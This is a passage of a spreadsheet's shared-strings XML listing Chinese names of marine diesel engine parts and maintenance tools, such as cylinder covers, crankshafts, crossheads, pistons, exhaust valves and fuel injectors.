    <t xml:space="preserve">螺柱-支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">卡环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀座环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖螺栓用螺母                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖再加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖底视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">定距管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">水套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖.侧视图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖.顶视图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸顶盖机架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平垫圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀座环入口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖.正视图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端                                                </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴                                                </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴+盘车轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲拐                                                </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴颈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">导环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">溢流阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">塞尺                                                </t>
  </si>
  <si>
    <t xml:space="preserve">制动螺杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">联轴节法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">参见补充项目表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导向装置-主轴承盖                                         </t>
  </si>
  <si>
    <t xml:space="preserve">对中工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴销规                                              </t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺栓衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺栓杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺栓液压拉伸器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">六角紧配螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮中心                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴大齿轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">止动螺杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调频轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重螺杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">平衡块毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴粗加工                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴零件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄半径                                              </t>
  </si>
  <si>
    <t xml:space="preserve">修理结果                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴变形                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴/飞轮安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴固态锻造                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柱螺栓螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">连杆体（毛坯）                                           </t>
  </si>
  <si>
    <t xml:space="preserve">专用螺杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连杆-修复                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承-上部                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承-下部                                          </t>
  </si>
  <si>
    <t xml:space="preserve">连杆螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴瓦                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴承座-曲柄销                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承.上部                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承.下部                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轮轴销衬垫                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴瓦                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承座螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带白合金的止推环垫圈                                        </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴瓦-上端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">轴瓦                                                </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴承总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴承盖-下端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴瓦孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">防尘十字头轴承盖                                          </t>
  </si>
  <si>
    <t xml:space="preserve">半轴环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油挡块工具.十字头                                         </t>
  </si>
  <si>
    <t xml:space="preserve">安装工具.填料函弹簧                                        </t>
  </si>
  <si>
    <t xml:space="preserve">接长螺栓.起吊十字头盖                                       </t>
  </si>
  <si>
    <t xml:space="preserve">滑块取出器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑瓦(工具)                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扳手支撑物                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起吊附加装置-连杆                                         </t>
  </si>
  <si>
    <t xml:space="preserve">保持工具.曲柄销轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">盖，十字头盖槽                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拆卸螺杆-十字头端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具.十字头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头橡胶盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承白合金                                          </t>
  </si>
  <si>
    <t xml:space="preserve">连杆十字头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连杆螺杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连杆(毛坯)                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺母盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">为连杆加衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">槽形螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴瓦.粗加工                                         </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴瓦-毛坯                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆螺杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆下垫片                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">填料函组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">壳体(半片)                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">座圈-刮油环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">薄片                                                </t>
  </si>
  <si>
    <t xml:space="preserve">中间环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支撑-刮油环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶盖2/2                                             </t>
  </si>
  <si>
    <t xml:space="preserve">座圈-密封环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">分段-密封环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑块轴颈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">十字头销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑油流量调节塞                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆导环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">止动螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">十字头铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">止推片                                               </t>
  </si>
  <si>
    <t xml:space="preserve">导轨薄垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">测量填料函                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导管.活塞杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">钢管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具.填料函                                          </t>
  </si>
  <si>
    <r>
      <t>填料函工作台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                       </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">工作台夹钳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">固定扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">定距块-填料函                                           </t>
  </si>
  <si>
    <t xml:space="preserve">固紧量规.十字头端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">十字头支座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架对应联接端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞裙                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶部活塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆填料函                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头和活塞裙                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滑动环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中间垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">通风管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器芯管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油喷嘴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸冷却衬垫                                            </t>
  </si>
  <si>
    <t xml:space="preserve">圆锥环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头毛坯上端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头毛坯下端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分配油环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞                                                </t>
  </si>
  <si>
    <t xml:space="preserve">专用薄垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞提升工具卡爪                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞导向环                                             </t>
  </si>
  <si>
    <r>
      <t>导螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                            </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>活塞头模板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                           </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">提升工具-冷却器芯                                         </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环扩涨器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扇形齿板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">爪.活塞环扩涨器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓-活塞裙                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具支撑物                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞吊装工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">延伸工具.座板.活塞                                        </t>
  </si>
  <si>
    <t xml:space="preserve">提升/压力测试工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">拉伸工具.填料函                                          </t>
  </si>
  <si>
    <t xml:space="preserve">测量工具-环槽                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞对中电子单元                                          </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔保持环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞(间隙)                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞销总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞再加工                                             </t>
  </si>
  <si>
    <t xml:space="preserve">环槽测量工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.整体式                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">销                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">导油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞导向装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃烧环活塞部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞(燃烧环)                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头/连杆安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却测试                                            </t>
  </si>
  <si>
    <t xml:space="preserve">进油支架                                              </t>
  </si>
  <si>
    <r>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                              </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>伸缩套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                          </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">延伸                                                </t>
  </si>
  <si>
    <t xml:space="preserve">回油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">切口管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">下行管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管支架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">放气螺丝                                              </t>
  </si>
  <si>
    <r>
      <t>定距管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                              </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>填料函壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                            </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">进油弯头固紧量规                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轧头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">空气进气阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">隔离环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气缸                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.空气缸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">杆提升-旋转测试                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀壳-上端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀壳-下端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀壳-热管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀壳-冷却                                           </t>
  </si>
  <si>
    <t xml:space="preserve">衬垫-活塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压缸                                               </t>
  </si>
  <si>
    <t xml:space="preserve">衬垫-油缸                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.执行器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀定距管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧螺丝                                              </t>
  </si>
  <si>
    <t xml:space="preserve">适配器垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油缸法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹节流孔螺塞                                          </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘排气阀套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧推力块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中心-燃烧防护                                           </t>
  </si>
  <si>
    <t xml:space="preserve">圆锥体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拉伸垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">叶片                                                </t>
  </si>
  <si>
    <t xml:space="preserve">叶轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">毂                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬模板测量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆模板测量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀阀杆导套-上端                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀阀杆导套-下端                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀阀杆导套总成                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀导套-上端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬轴导向装置上端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬轴导向装置下端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬.排气阀杆                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封圈法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">毛坯-中间模板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带叉形杆的侧板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">不带叉形杆的侧板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆.弹簧导块                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆轴销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承弹簧横栏                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水接管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆                                                </t>
  </si>
  <si>
    <r>
      <t>壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                        </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">杆                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">杆导向螺杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">板.油调节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">动力油缸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">动力活塞.外部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">动力活塞.内部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀体冲洗                                            </t>
  </si>
  <si>
    <t xml:space="preserve">执行器盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">执行器壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">量径锥                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀盘                                                </t>
  </si>
  <si>
    <t xml:space="preserve">连续清理气缸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">芯轴                                                </t>
  </si>
  <si>
    <t xml:space="preserve">入口+排气阀弹簧                                          </t>
  </si>
  <si>
    <t xml:space="preserve">衬垫                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆密封圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞密封圈                                             </t>
  </si>
  <si>
    <r>
      <t>活塞导环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                             </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">圆锥环2/2                                            </t>
  </si>
  <si>
    <t xml:space="preserve">进气阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆导向装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支架-安装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀底块量规                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座量规                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀杆量规                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气动活塞锥形环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">研磨环-排气阀座                                          </t>
  </si>
  <si>
    <t xml:space="preserve">工具.应急开启排气阀                                        </t>
  </si>
  <si>
    <t xml:space="preserve">磨环.排气阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆轴衬                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧                                                </t>
  </si>
  <si>
    <t xml:space="preserve">固定螺丝                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带翼形衬套的锥形阀                                         </t>
  </si>
  <si>
    <t xml:space="preserve">锥形阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">翼形衬套毛坯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">翼形衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚球轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">硬金属层                                              </t>
  </si>
  <si>
    <t xml:space="preserve">回旋盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">止推轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥形阀块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">磨损调整                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀总成                                               </t>
  </si>
  <si>
    <t xml:space="preserve">颈环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀桥                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀桥左部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀桥右部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球导块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调节螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气阀传动机构                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀安装                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸液压单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">分配块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">返回油标准管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压排气执行器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油缸底块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油缸中间块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油缸顶块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.第一级油缸                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.第二级油缸                                          </t>
  </si>
  <si>
    <t xml:space="preserve">油缸.整体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴衬.油缸                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压燃油泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">顶盖总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油柱塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内针阀套筒                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油泵套筒                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压柱塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">法兰.旋塞阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力块.旋塞阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">清洁工具.开闭阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">清洁工具.数控阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">蓄水罐                                               </t>
  </si>
  <si>
    <t xml:space="preserve">先导油蓄油罐                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴                                                </t>
  </si>
  <si>
    <t xml:space="preserve">喷水阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷水阀头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气控制块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴衬                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀壳体毛坯                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管-推力轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">制动环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器包装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">底座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">推力块毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">底座弹簧导向装置毛坯                                        </t>
  </si>
  <si>
    <t xml:space="preserve">针阀偶件+燃油喷嘴                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷嘴-样板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷嘴.毛坯                                           </t>
  </si>
  <si>
    <t xml:space="preserve">切断滑块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">针阀体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">切断轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">切断管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">高压管连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">杆毛坯                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴针                                                </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑动衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑动轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支撑.喷油嘴总成                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">楔-喷油嘴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油嘴.盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">底块.支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑块焊接工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">导盘                                                </t>
